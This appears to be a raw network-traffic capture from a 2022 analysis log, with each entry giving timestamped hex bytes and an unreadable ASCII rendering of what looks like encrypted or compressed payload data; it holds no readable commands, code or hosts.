                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25288INData Raw: 1d 4f 81 a2 c5 a7 73 43 cb 13 ae ae cf 47 0d da 06 49 65 10 60 a1 ef 0e 12 c7 22 b2 d3 e1 61 38 85 83 3e 25 f8 2c 64 ac 6a ec 2e ad 64 63 2e 9c eb 07 f4 66 7d 87 6b c4 91 8b 62 94 7d e2 4f 60 89 74 7d 9e 49 dc e5 c3 a6 8b 12 7e e1 d5 3d 1d f5 31 9d df 7b 61 37 54 53 89 25 9b 8c 47 75 3a 46 2b c9 f1 be 31 58 63 07 59 04 01 3e 16 a6 fa 6f 55 33 1f 0b dc de 61 07 07 75 7c 1e 6e 3c 08 3d e0 ff fa da 27 f5 09 83 b5 6d cd 94 9c 40 ea 21 31 37 76 ca 6b 1f 00 f3 23 d7 00 db df 0a 1f 1d 16 e8 31 8b d1 a4 3b 74 33 f0 9f 6f ef 88 d0 97 98 ef 34 d8 9d 3e 06 f4 a2 21 61 f0 e5 7e 48 6f 00 44 ab a2 dc 19 7e 42 16 e9 da f4 b6 46 84 2b fc 73 87 bb 1a b6 2e ad 3e bb 33 68 41 cd 3f 8b c5 16 c6 00 c0 3e db c1 39 92 8a 39 24 ed 67 53 2e 64 22 16 be 9c cc ac 2d de 90 9f 6f 0a
                                                                                                                                                                                                                                    Data Ascii: OsCGIe`"a8>%,dj.dc.f}kb}O`t}I~=1{a7TS%Gu:F+1XcY>oU3au|n<='m@!17vk#1;t3o4>!a~HoD~BF+s.>3hA?>99$gS.d"-o
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25304INData Raw: 00 72 98 17 04 37 8a 91 79 35 ac 82 ad 1e 02 65 0d 93 6a 77 fe 61 ad 09 30 f0 ca e5 ee 95 64 52 9c e1 e4 0b 26 e2 bb 62 ec 0c fd ca e8 23 e8 df 2b 97 fd 62 2b 89 5d 77 1e 9e 8a 16 8b 13 ec b5 aa 20 0f c3 20 9e ed 76 fc fb 9e 85 88 ff d3 00 3d 9d 50 4a 10 5c 9b 64 c6 50 cc 0c af 9c cf f5 5e 23 41 1e cd a4 e9 df 00 ac 3b 03 a2 fe 70 38 df df e0 7a 17 5f 6b 8a 26 0d 46 53 55 c5 6b 50 3f 92 5c 37 16 8f a7 dd 8e b6 13 67 a6 70 c9 65 4f 3b 6f f8 16 c2 18 45 41 54 87 d1 33 60 0e 99 4a a4 90 e9 d8 ba 3b 60 1e 79 73 62 e2 25 2b 69 dd e8 c6 b8 13 7c 30 4c cf 6a ca 0f e2 2d b1 a2 ff 82 50 64 a3 97 db f3 4f e7 1d 46 e4 4c 4b c1 89 d7 9d 6f 6f d0 03 88 ca a5 37 d6 5b 12 c8 87 fc 01 4d a6 98 29 b5 ee 3c 01 d1 4e 3a 61 d3 cb d0 b8 04 98 86 b1 b5 95 43 93 65 af e6 7e eb
                                                                                                                                                                                                                                    Data Ascii: r7y5ejwa0dR&b#+b+]w v=PJ\dP^#A;p8z_k&FSUkP?\7gpeO;oEAT3`J;`ysb%+i|0Lj-PdOFLKoo7[M)<N:aCe~
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25320INData Raw: 0b 84 a4 9e 3b 0b 2c 6b c8 42 d4 0e 84 23 b4 23 69 9d 8b a8 66 2f 0a a8 a0 d6 aa d6 db e7 71 88 6f 52 2a 4f 26 b6 97 80 4f 46 ad 7e ea 69 91 61 79 a9 35 28 c5 3b ed 9a bd d2 8c ac 4a 3f 41 b2 41 25 e6 52 ec f3 e2 bf 5b 8c 80 57 3f b0 eb 89 93 f0 4e 22 1e cb e9 90 e8 14 83 1e 5c 51 a3 26 0a 35 a7 44 ac 08 f4 a5 f9 95 67 c7 18 ec bf 37 f2 04 da 49 05 ed 99 ac 43 c2 c1 f6 1c de 6a 8d a4 bd 40 00 d0 70 34 d9 64 f6 b5 0e 19 48 8c 21 7b 1c 43 2c 5f c1 10 96 b0 41 15 46 e4 84 75 70 44 86 31 35 a3 ca 8f ee d1 40 b3 10 3e 12 bc 4a af 31 70 6e 02 a0 d7 0f 37 1c a2 f4 72 60 70 b9 49 ce 73 95 dc 92 a1 7a db 59 dc 8d dd 2b 27 24 dd dd 75 19 71 87 b8 c5 34 4a b1 54 0f 5c b8 a5 23 7c f8 18 77 36 a5 b9 04 e2 f3 2d 6f ac 6b 7a 9a 73 db 64 a7 79 90 34 e6 4c 90 45 92 7a 80
                                                                                                                                                                                                                                    Data Ascii: ;,kB##if/qoR*O&OF~iay5(;J?AA%R[W?N"\Q&5Dg7ICj@p4dH!{C,_AFupD15@>J1pn7r`pIszY+'$uq4JT\#|w6-okzsdy4LEz
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25336INData Raw: 2a cb 43 7d 70 b4 80 06 83 4c 2b ed 1f db 7a fa 93 f9 b5 56 0d 7f ce 82 4c 87 0c 99 58 d4 9b 5a a1 93 98 cd a9 bc a0 0b 85 55 10 4a df 6f 5f a9 d9 f1 bb d2 d4 23 06 76 a4 95 e8 14 12 65 8f 48 a8 58 15 fc 8e 70 f9 57 f1 d3 e7 9a 01 84 71 bf 4f f7 b8 55 64 a8 13 e4 3f 78 2e 98 8a 7b d0 87 51 40 46 b0 36 f1 7f 32 a4 a3 ea 36 d0 74 cb b6 5c 60 64 a4 5c 6d 14 17 19 d3 87 52 d8 35 9b 1a db 12 98 c6 62 16 ae 5a 24 9e cd b1 c4 59 94 d6 ad 6f d9 0f 0f ff fc c2 84 5c 2c 2d 32 a5 1a 53 d1 7b 80 7d ea 60 96 94 75 3f e4 3e 94 95 04 83 4c 95 e4 69 6d e3 4f 2b 86 c9 37 a0 8f 5b de 0d f8 51 b0 23 cb 0e c5 94 83 59 7f af df af b4 bb 08 84 70 cf 4b d4 3e f5 82 c3 44 c2 61 ea cd 41 33 12 4e bc 49 44 f6 f9 84 f0 51 c8 7a e8 dd 1c 72 b5 ea ef 24 72 b0 d8 60 1e ee 0a 92 86 0e
                                                                                                                                                                                                                                    Data Ascii: *C}pL+zVLXZUJo_#veHXpWqOUd?x.{Q@F626t\`d\mR5bZ$Yo\,-2S{}`u?>LimO+7[Q#YpK>DaA3NIDQzr$r`
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25352INData Raw: 30 a3 a6 74 1a bd 95 69 f3 61 c6 16 8e 21 2f 7a c9 21 b6 33 21 a7 21 00 d6 9c f2 e6 12 19 73 04 e3 1f cd 61 51 6f a7 b7 07 42 9e 87 e6 1a d9 52 1d ba 90 47 24 9e 89 d4 0c c4 ed d8 53 01 c7 8f aa 23 2e 92 6a e6 bf 2c 63 e0 49 99 a9 23 49 44 28 f3 0d b8 ee 89 eb af 92 a9 35 ce 2c 00 90 f1 37 bd d0 2f dd 65 38 6a 6f 7c 40 06 f0 74 e8 1b c6 72 80 01 96 71 bd 53 38 c1 e3 af 81 17 bc 27 2c da e4 9c 83 bd 9b 91 b5 d1 5c 3f ef 26 9a cd 9d ec 9f f6 c1 0f 94 48 f0 29 f2 11 02 0f 92 8c 9b c0 56 58 c2 9c 02 35 30 26 e5 38 a7 d9 ca 98 54 cd 3c 61 a0 92 1e 21 d8 85 fe 3c d2 b4 bc 1a 50 fd 53 e6 f9 e0 02 33 15 c2 8c 37 c1 fa 58 3d 62 c5 41 5b 1c 50 e5 45 49 a5 dd 95 87 4d 94 89 31 75 f4 72 7a 76 d4 75 a6 fc 7b 87 d7 03 93 0c b0 7e 25 c1 6d 7a d6 eb 0b 4e ec b5 20 ca 6b
                                                                                                                                                                                                                                    Data Ascii: 0tia!/z!3!!saQoBRG$S#.j,cI#ID(5,7/e8jo|@trqS8',\?&H)VX50&8T<a!<PS37X=bA[PEIM1urzvu{~%mzN k
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25368INData Raw: 1b 69 65 33 18 bd cd 83 cc ba 67 6e 6e c6 3e 90 cb aa ce 46 4b 67 72 c6 96 81 81 9b dd ba df d0 8e 93 bf 5c 83 bc 97 d4 60 b7 1c 26 5a 52 81 c7 6d 28 c6 c9 99 cb 5e 79 4c 3f c5 a3 56 db 62 ce f1 3f 93 78 f1 8c 3d e0 9d b4 92 ab ee 8d 9d cc 7a 93 19 e0 38 ac 4f 9c 39 48 4d 01 94 09 9b 62 64 86 75 78 f0 9a 7c 53 b2 2f cc dd 52 66 1a 74 a6 80 a0 94 8b 37 8a d0 dd 51 dd 50 6d 8b 0f 2f 19 a0 d4 44 b5 4e b2 15 1f e8 c3 7d ac 8b ef 17 9a b5 4b 9c 83 29 27 2a 37 34 68 43 51 ad 74 64 f5 ed 7b 6b c9 62 e5 fd 0f d4 7b 23 87 79 c3 90 ac 06 dc e5 f9 8b 49 36 79 d9 77 53 4b dc 5d aa 49 2f c3 3c be 40 94 eb 68 66 c6 ca ce 98 a7 3d d5 b0 b9 4a 39 56 42 19 53 a1 ae 0e 4d ba fa cc 36 23 18 85 bb 90 09 7c ab 05 e4 0e 03 5a 48 df dd 96 97 d9 cc 7c 7a 6e 65 fb 2a 6d df 04 71
                                                                                                                                                                                                                                    Data Ascii: ie3gnn>FKgr\`&ZRm(^yL?Vb?x=z8O9HMbdux|S/Rft7QPm/DN}K)'*74hCQtd{kb{#yI6ywSK]I/<@hf=J9VBSM6#|ZH|zne*mq
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25384INData Raw: 58 78 d1 b6 f6 6b c8 87 a6 63 fe 77 d5 d2 81 08 67 1e 93 47 36 77 04 f6 de 03 5b 54 eb c1 08 7a 8b 20 56 11 39 23 19 eb 4e ab 98 59 7a 01 e9 2a 99 8d a1 40 dc 43 99 8a 1b d3 d6 d2 aa 79 c1 63 71 01 2b de 43 e5 55 c5 96 65 4f 88 76 88 2e 71 32 c1 2a 24 ce 28 21 d8 b9 85 a9 6e e6 f3 33 ca 95 4b 21 d4 db b7 21 d4 7a b5 90 b5 87 44 38 0f c7 ff 1f 61 5b be 09 f3 94 cc f5 45 2a f1 b8 48 35 d8 9c 8c 29 1f e9 05 69 6f b4 15 3c df 85 72 7f 7a fc 81 a6 6b a4 24 90 33 58 38 0e cd 5a ff d6 6f 2f e8 53 0c 91 93 d5 ba d6 97 49 e1 4e 3a 4c 43 f9 84 6a 33 9b a7 ed 38 84 f0 77 f1 c2 4f 83 ea c2 3d 1b 64 32 90 dd 75 12 19 82 19 b5 fb 37 ef e5 2a 5f 84 13 57 7c 6a 1c 23 69 e1 a0 fa 12 b6 8f b3 ec 1d 1b db 5e af 80 52 c7 bd aa 2d 02 90 3a f2 a6 8c 2e 20 48 b3 c4 bf 7a 41 a3
                                                                                                                                                                                                                                    Data Ascii: XxkcwgG6w[Tz V9#NYz*@Cycq+CUeOv.q2*$(!n3K!!zD8a[E*H5)io<rzk$3X8Zo/SIN:LCj38wO=d2u7*_W|j#i^R-:. HzA
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25400INData Raw: 61 89 3a 32 38 40 b1 4e 75 d0 7b b1 06 eb ea b3 ca 0c dc ab a4 86 c8 85 f7 75 bb 77 f5 ca 33 2e 02 27 5c 5a df 89 8c 49 05 92 6c 59 ca 88 63 0d 49 bf 14 3a 57 06 d0 4d f3 60 f0 4a 3c e9 de 60 b5 8c 2a 82 14 41 09 c5 4f 3d db a2 7f 7c df b6 92 72 a9 ce 1d eb cb 5d e5 f7 cb a3 ef 86 10 e1 bb d1 0c a2 d7 b1 d1 d5 6a 41 c1 5c 1a 31 09 a9 1f cb 7b 6c 77 ab 92 b6 fe ec 94 f9 5c 4f 4f 5e 61 22 2c ff 15 ad 78 ee a5 0d 71 03 38 24 4e c0 c0 10 4a a3 1b e2 0d 70 73 e7 6b 32 bc 76 db d4 5b cf db 64 64 cd 29 24 95 bd 86 4a e0 b6 66 a6 6b 5d 84 a8 9e 95 10 81 c5 80 25 33 34 65 36 eb e0 cc c9 58 dd d9 cf 05 3d 37 57 84 15 87 75 0b c1 ef 8c e8 6f e3 84 da 0d a3 ea de dc db ba ce 02 db 63 b5 2e db d6 d5 4c 65 43 48 4b 4f a7 9b 7d 9c 25 85 be 18 e2 de 60 15 b4 c3 cc 41 45
                                                                                                                                                                                                                                    Data Ascii: a:28@Nu{uw3.'\ZIlYcI:WM`J<`*AO=|r]jA\1{lw\OO^a",xq8$NJpsk2v[dd)$Jfk]%34e6X=7Wuoc.LeCHKO}%`AE
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25416INData Raw: 1c 9d c7 43 29 65 7b 4f 43 a9 f8 69 4a 05 d0 3a 8b 2e a5 c8 1a 79 97 19 48 de 50 a4 f8 b5 c7 69 c0 75 4d 43 46 2e 64 68 10 21 bf 5b 4a 38 80 68 53 46 61 c2 86 bb 94 02 5e 5b 09 3a 58 b1 e3 a9 b4 e1 5e 67 a1 38 ca 6c 37 6a 5f 6b d4 6e 46 5d 21 a1 25 bc be e7 91 9f 7f 06 f3 86 cc 04 e4 10 36 e9 44 2b 18 7f f6 19 ac e0 29 8b 40 33 37 3d 42 ca 91 53 fd 13 49 13 9e 57 03 1d 9e 11 29 4f 39 03 01 3e 8b f2 18 9d 40 c5 9c 97 f8 66 7c 36 3b 53 a6 47 90 b3 90 7d a6 96 f7 8b 9c f6 51 3e 99 10 aa 32 26 ed e4 32 85 47 90 21 f1 e0 6c 2c e4 cc c7 39 fe 8f cf 6d b7 f9 ad 29 b1 5c 05 b9 48 87 65 48 9d c7 6a 95 c9 83 f6 4c ee fc b3 26 8c 8d 6f 9e 3f 64 87 35 d8 26 43 ad 5a e8 2e e1 2e 62 09 d4 97 f7 ba aa 2d 64 2b 5b 1d 7f 63 ee 3c a1 f6 8a 0f e3 b8 f1 49 4c 70 5d 81 24 65
                                                                                                                                                                                                                                    Data Ascii: C)e{OCiJ:.yHPiuMCF.dh![J8hSFa^[:X^g8l7j_knF]!%6D+)@37=BSIW)O9>@f|6;SG}Q>2&2G!l,9m)\HeHjL&o?d5&CZ..b-d+[c<ILp]$e
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25432INData Raw: 58 a5 c3 a0 e0 39 7c 20 68 fb d3 9b d0 16 21 fe b8 9c c0 3f 82 34 90 d2 fe 82 43 cc 6b 56 49 12 a2 78 d0 20 3f 20 a0 40 4a e8 5b 12 0d 5b 03 9d c0 96 8b 3b c2 fd c0 97 05 f5 65 11 5c 1e 79 e2 50 e9 57 c0 02 b9 6b 02 7f 4f 84 a3 5f 0a 07 9f 7c 0e a2 10 96 2a 0a 64 b3 f9 e0 d8 fd 91 98 a7 86 8b 37 02 90 e5 4b ef 72 ee fb 0f 6b df 4b 5b a6 e4 1b 6e c0 73 24 1d 70 a4 2d 72 9f e3 1b d0 d3 b0 f6 90 7f c3 5c 01 2e f3 5b 38 70 c6 53 a2 57 a6 b4 be 55 79 92 b8 53 b7 56 4e c6 4c 45 20 4e ad ee d0 db 90 9b c6 eb e1 91 0e 79 02 53 cb 31 b6 1c 6f 92 77 7d 7e 22 1c 9f 97 a5 9a 9d e6 c7 06 03 fd 9c 5f 7d d1 7b 77 03 ee 43 cb 0a cb 62 4a 0e 49 5e 0a 15 4b fe 35 d1 5a f4 62 d2 0f bf 4e 65 6b 11 b4 3a b2 c9 5f 2e 85 ff d8 a3 10 19 26 1b d3 7b eb 3c 7d 59 0a cc f6 de a7 1d
                                                                                                                                                                                                                                    Data Ascii: X9| h!?4CkVIx ? @J[[;e\yPWkO_|*d7KrkK[ns$p-r\.[8pSWUySVNLE NyS1ow}~"_}{wCbJI^K5ZbNek:_.&{<}Y
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25448INData Raw: bd 7d 6d a6 04 b5 19 75 31 a6 aa 45 17 b6 bf 0e 1f ef 42 5e 1f ee c5 54 77 de ba 93 07 22 49 41 23 12 13 f2 f9 1d a4 18 fb 81 1e 8f fe 0b 4d b0 b0 be 56 a9 bb 8e 9e 6c 3b cf 62 f0 09 e0 6a 8f e4 f9 45 e5 f7 f2 12 26 5c f8 30 a1 5e 5b a3 bb 14 21 a9 1a b4 5f ee 0d 37 ef 9d a0 62 ee 90 de 91 45 23 5f b4 e1 b0 49 40 77 d0 bd b4 7b a4 91 21 02 71 75 ea da fa ff e9 bd 9b 8b 23 47 b3 9d cf ff 77 1c ce bb b8 e2 ee f0 fd fe fc 5b eb 18 91 e4 b1 4e 99 e3 24 c1 87 9e 9e c8 be 38 43 23 97 70 00 96 72 7e c2 59 bd 1c 44 10 1b b9 74 b1 34 2e ab 1a bc d2 c4 78 e0 93 38 6f 80 b1 b1 f7 ef f8 32 d0 51 72 40 43 86 ee f8 3a e3 c9 5f 36 98 57 34 97 10 e5 c8 90 7a b7 d3 e8 22 f4 29 f4 02 bb 79 ae fe 7f 29 0d 44 75 04 b9 d6 3a 84 b4 42 93 35 77 d6 f0 54 45 49 07 ae 46 2a b5 9e
                                                                                                                                                                                                                                    Data Ascii: }mu1EB^Tw"IA#MVl;bjE&\0^[!_7bE#_I@w{!qu#Gw[N$8C#pr~YDt4.x8o2Qr@C:_6W4z")y)Du:B5wTEIF*
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25464INData Raw: c2 44 c7 c9 16 ca c0 8b aa 34 be a7 f9 25 c5 02 7f e8 42 72 37 61 38 16 25 27 85 8d af c8 18 28 c6 f4 ac c0 3d 77 e4 8b d8 a5 2e 3e a6 a7 72 1f 26 c9 e1 24 4c b8 ab 6d 82 74 38 6c ee 4e 4f 70 8b f9 11 3f c9 5f 7a cc b3 66 e3 64 eb 6a 70 af f9 a5 42 1c 82 2a d1 c3 cb ab 5d ca 19 ac be da 4c 2d 7b eb 78 4e bc 5a 1d e6 74 89 c7 04 50 47 42 62 9b 97 ca c5 dc 67 e7 73 2f 96 7c 54 47 c1 ad f7 6d ec 99 8e fa 36 f5 aa 44 11 9a 35 29 4f 28 1d 64 88 78 a0 12 e7 6f 90 a9 70 54 78 97 38 e7 0a b2 ba 2d 70 5e fe 24 0b 8d c9 e5 8c b6 04 ff 4e 45 df fc 10 d9 44 a2 76 b6 b5 ff c6 30 68 b4 e3 4d 91 6d d1 d9 4d bb 21 37 0e 9b 9b 86 e7 1d e2 2e e9 91 fc ec d4 d5 24 64 6b df 67 e9 48 16 5e 42 49 a0 10 71 ca 41 73 40 ea 7c c4 02 28 07 9d d7 3f f8 fa a2 1f 08 38 20 07 65 aa eb
                                                                                                                                                                                                                                    Data Ascii: D4%Br7a8%'(=w.>r&$Lmt8lNOp?_zfdjpB*]L-{xNZtPGBbgs/|TGm6D5)O(dxopTx8-p^$NEDv0hMmM!7.$dkgH^BIqAs@|(?8 e
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25480INData Raw: 43 10 46 6f 55 b1 3e 73 6e 3b 1d 60 af 12 d1 17 71 b6 6f 87 62 39 2b fa c2 da e0 82 28 a2 6f 6d b7 46 23 d0 8f 6a 7a 29 4d 1e 35 a2 af ac 43 6d 57 4f 89 ed 98 95 11 77 0f b4 da 3a c6 d8 89 d5 d3 2c f9 0e 9c 18 04 a4 3f 83 b9 12 b2 6c 2d 32 f3 41 75 1e 39 56 b5 dd 00 29 18 32 16 7e 52 88 a5 76 0a 80 88 3b cf b3 0b ab c4 09 73 cf 85 b9 f8 40 32 9a 22 50 bf 60 12 61 f1 5b 65 e7 b8 c9 24 32 88 d0 c8 f6 04 e2 56 6d 34 50 e8 1f a0 bf f3 f8 45 99 3e 8d fb 8e 34 0a 5a 66 96 47 c6 4a 38 c0 95 7e f1 63 6f 23 0a 2e 10 be b1 c1 7d 13 89 0d f6 59 6c ce 2d 51 3a 51 5a 1d 75 e0 53 bc 8b 7e e0 9c a9 25 2d 03 27 a3 b4 20 49 0e 2a 6d 69 b0 d1 b4 9c 58 e6 8f 3d e3 39 dc 13 cc 2f d6 08 52 5a 0f ea ee 3b bd ba d7 94 b8 20 02 39 03 bc 9e 0b 62 d6 38 c9 12 75 60 77 0c b1 cd 94
                                                                                                                                                                                                                                    Data Ascii: CFoU>sn;`qob9+(omF#jz)M5CmWOw:,?l-2Au9V)2~Rv;s@2"P`a[e$2Vm4PE>4ZfGJ8~co#.}Yl-Q:QZuS~%-' I*miX=9/RZ; 9b8u`w
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25496INData Raw: 7f 82 66 87 dc 3a d7 ac c3 a0 7d f6 9b a1 1e 72 26 ba 57 54 d1 1b bb 1c 26 4b 9a 97 1b a4 02 2f 2b 0c a4 4a 48 c0 24 52 4c 32 94 b5 80 16 69 f6 8c dc 37 70 83 e8 f3 66 a7 83 52 4b 03 52 6a 86 65 f3 7c 70 3d 6f 24 e7 0b 82 70 b1 18 c7 e8 b1 92 32 aa 2a 27 46 92 82 55 51 34 6d bd 4c a7 16 b3 7e 75 92 be 8a 0b 45 85 20 76 22 ee f2 c3 db ab 9b 57 fd d1 3b fa 18 18 c0 e7 60 d1 ae ec 8b b9 6f a4 a8 04 fc 28 f2 68 97 a0 1f 90 c8 7c 54 7a 76 25 6d 9e 02 30 c3 67 fd a8 82 cb 28 53 56 28 d9 34 b1 7d fd 92 f3 b1 1d 83 0e db af 4b 0c 82 db 3b 11 d3 8a 22 84 19 cf 55 b0 15 60 16 87 df 3b f3 63 2a 08 2c 2b 69 48 32 10 ff d4 af 8d 14 7c 4e 20 7b 29 c1 a1 24 a2 dc fc 7b 78 e6 af 3f 7f 7d b2 11 19 72 d1 f3 03 96 69 19 59 32 14 2f a8 d7 d9 b2 81 a2 07 41 ad ab c3 89 25 a9
                                                                                                                                                                                                                                    Data Ascii: f:}r&WT&K/+JH$RL2i7pfRKRje|p=o$p2*'FUQ4mL~uE v"W;`o(h|Tzv%m0g(SV(4}K;"U`;c*,+iH2|N {)${x?}riY2/A%
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25512INData Raw: 2c 8a 72 a0 72 ba 38 e8 f2 c1 4c 66 69 1f 2b ac 17 90 a2 a2 ca a6 ef d1 7b 30 27 69 47 77 57 dc 65 2c 24 94 87 0c ab 42 c7 2c 29 79 82 1e 20 23 73 1c 30 7d cc 7b 39 05 16 53 bb 7a 57 99 b9 4e e7 76 32 5f 1c d3 5e f2 e7 d7 47 fb 9d a4 5f b5 3b 1e 51 ed e9 13 9a 9f 54 8f 52 1e 63 b6 1c 3a b9 c3 6c 26 cf 46 9c ff d7 d9 5d fa a2 c1 77 55 ba 9d da 7d 26 1f f3 d1 c2 4d da 38 94 7a 3c 37 61 fc e1 a5 42 e9 13 04 8c 61 8c 6c fe d2 02 43 96 6f b2 91 89 82 31 f0 88 21 bb 53 a5 38 41 2e af 73 79 21 7e f1 ea 7e b2 80 61 95 8a b3 41 a4 a8 2f 2e 04 55 ca 45 ad 8a b9 84 05 1c cb 8d ae 8a 31 99 2e 88 11 e3 ee 86 dc ae 85 52 fe e3 98 73 d9 28 2d 17 8f c3 e6 17 24 50 af ea 66 ad df 4b c4 af c4 52 57 38 c6 8d b6 70 a9 73 ed 48 37 69 93 62 d9 28 e2 86 6f 25 82 58 aa b7 0e ed
                                                                                                                                                                                                                                    Data Ascii: ,rr8Lfi+{0'iGwWe,$B,)y #s0}{9SzWNv2_^G_;QTRc:l&F]wU}&M8z<7aBalCo1!S8A.sy!~~aA/.UE1.Rs(-$PfKRW8psH7ib(o%X
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25528INData Raw: af ac f8 77 8b 99 b1 48 4c c5 3a 8b d6 1b c3 1d a6 bf 10 5a d3 60 e6 8d ab 14 e2 f9 25 40 c5 89 76 d9 4d f1 1e 95 b0 db 0b d4 2c 91 0c 68 7a e6 4c 00 e1 35 80 08 a3 34 ae fd 7e 36 08 08 86 98 10 f9 ee 4d 0d 40 e3 a2 1d b9 e8 97 2e bb ed f2 f4 15 cc 80 b4 54 dd 32 59 7e ac e7 13 9d 17 be 2c 19 96 15 3f 1b fb e6 0a d5 0f 67 42 a9 04 4e ae 13 64 c1 71 5a 1c 2d 10 47 6a 11 e0 0e 00 28 1d ce 12 f8 f9 4f 78 7d 32 21 cb f4 26 fd f8 d8 f0 b6 ce 7d 5a 71 6c fb 12 e1 26 18 88 85 ac 9d 99 c0 17 f5 67 99 70 54 a2 4b 72 09 37 0f 30 e0 c6 c7 96 95 2d b7 fc a2 ee d9 11 ed 3f 19 59 eb e2 0e 07 ec 3c 42 5f c0 aa 84 dd e5 11 56 21 5b 67 c5 43 0a 79 70 aa dc c4 2c 0e 82 5d ec 28 2b 49 e3 ba e8 06 17 0d 91 96 cb ec 76 7b 13 a0 27 2a 6c 3d a7 51 38 89 04 b8 fc 5d 26 ab bd cc
                                                                                                                                                                                                                                    Data Ascii: wHL:Z`%@vM,hzL54~6M@.T2Y~,?gBNdqZ-Gj(Ox}2!&}Zql&gpTKr70-?Y<B_V![gCyp,](+Iv{'*l=Q8]&
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25544INData Raw: 6a 3b bc 5c 9e 3c ee 31 39 55 df 4d cf 61 ee f5 62 8d 06 8f 63 74 85 2e c3 e3 47 fb 07 b6 66 ee e6 e5 73 64 6d 19 3a 2b 56 94 8e a4 e9 c6 62 7b 95 dc 65 ca 95 56 40 7e db 60 be a4 42 30 b7 f2 66 a1 7c 5e 12 51 04 b2 87 e3 d4 e4 ed d9 1c 97 9a 3f 4a 40 28 a7 b8 53 45 5e f2 eb b3 76 c1 69 83 1e 5e cc cb 59 47 9b 88 a5 c8 91 db 4d b8 f4 79 9b c2 bd bc 9a 8f ef b2 15 ef 65 d3 02 98 2e 2d 68 ed e2 be ca 40 68 6b 9a d8 7c e4 27 78 44 38 e7 42 23 fb ab 83 f4 14 4f 77 4a d8 ba 05 3c 83 69 53 9e fc 67 08 90 95 13 4e 3e ac fa f0 36 7a fa 54 42 ee f9 8c a6 59 ed 5b 3b df d2 cd 67 55 48 f7 58 e6 bd c5 86 86 45 7c 7e 15 2b ec ab 63 04 fa 8d 3b 06 70 99 b8 3d 69 da 58 1f f7 75 04 38 94 7e c6 e6 a9 d7 03 c1 ae 99 ed 7c 54 d7 79 dd 64 a9 76 fc 4b 9b fd 42 5d d0 5b 09 78
                                                                                                                                                                                                                                    Data Ascii: j;\<19UMabct.Gfsdm:+Vb{eV@~`B0f|^Q?J@(SE^vi^YGMye.-h@hk|'xD8B#OwJ<iSgN>6zTBY[;gUHXE|~+c;p=iXu8~|TydvKB][x
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25560INData Raw: 97 fd e1 df ec 8f 72 91 e9 8e 8c 29 74 a2 4b 2a 78 07 7b 95 d1 52 26 57 20 0b 27 0d 26 87 85 60 67 25 f2 6a 7d 4d b0 aa f0 e2 9f b8 17 db 3a 40 a9 6d 7d 82 bf 7b 6c 48 4d 38 2d 40 90 0b fe 0c 9e 37 cb 10 22 45 c2 38 7e 30 3a b0 88 5d 67 b0 df 9c 07 a0 52 fd a1 10 69 db 93 17 65 73 e7 70 b9 0a 61 7a dd fa db 1f 25 82 83 89 71 fd 21 3e d9 97 6a 3e 85 c7 14 5b a1 68 46 2e 8d 66 97 7d 0a cc ac 78 f0 19 b1 ba ec 65 c9 80 07 58 22 82 f4 1f fc 6a f7 c0 a5 c1 41 61 99 91 9e 1e 13 bc 19 19 bd e1 6a ca 49 e9 09 a9 90 91 30 d9 c1 4f bf 4e 1f e1 c2 96 90 c3 7d 3c db 18 8d 29 57 aa 51 f1 23 bf 25 40 9d 5f 13 1e 6b 3b 41 a6 a6 c9 f9 2c 83 7b ff 2c 9d cf 97 61 68 99 03 15 e5 74 79 c7 1b 5e 07 3a 6c a7 01 aa d0 09 32 8c fb 32 e2 2e 02 c0 7c cd 3b d1 a7 73 48 98 91 29 6d
                                                                                                                                                                                                                                    Data Ascii: r)tK*x{R&W '&`g%j}M:@m}{lHM8-@7"E8~0:]gRiespaz%q!>j>[hF.f}xeX"jAajI0ON}<)WQ#%@_k;A,{,ahty^:l22.|;sH)m
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25576INData Raw: 45 34 55 2e e4 34 2b fa cb 74 ae 70 2b 18 50 51 68 7c 5b 2f 7a 90 c6 d3 e4 28 b5 48 2d 14 09 2b e9 f4 c6 29 07 15 9d da 40 a9 a4 da c2 9a e8 f3 6f e4 aa ae 59 80 9c 32 e3 55 2c 96 20 20 4c 71 a6 25 1b 10 f1 df 73 03 42 bf 1b a8 48 14 38 33 01 3c 97 49 c4 21 d5 29 aa 41 13 b5 4a 5e 95 49 0b ba 15 8d e2 e0 59 f1 5b 22 10 ee e1 f6 ff 6f dd ca cd 72 d2 82 81 f8 9a 55 01 41 93 24 fe a6 d7 09 2f 87 b6 81 40 db da 8d a7 e9 a8 37 05 b8 86 65 90 0f 6b 54 43 5a 53 e9 10 84 3d 11 0f 8f ac 04 61 51 41 18 3b 6c bf 27 8c c7 08 82 d5 36 b3 ff d5 81 4c b6 45 38 af 22 4e 47 f6 e3 b4 83 f2 f7 cf ce e2 67 a0 b3 52 7c 37 6a ef 9b f9 36 b0 e7 a3 cc 49 e9 a3 ab 1e 64 fb 6e 1b da e8 00 7c dc f5 4f f3 e4 80 4c b6 f3 2f 4b 30 a3 d3 c4 de cb ad c4 81 09 6a 55 57 c1 39 3c fb f7 72
                                                                                                                                                                                                                                    Data Ascii: E4U.4+tp+PQh|[/z(H-+)@oY2U, Lq%sBH83<I!)AJ^IY["orUA$/@7ekTCZS=aQA;l'6LE8"NGgR|7j6Idn|OL/K0jUW9<r
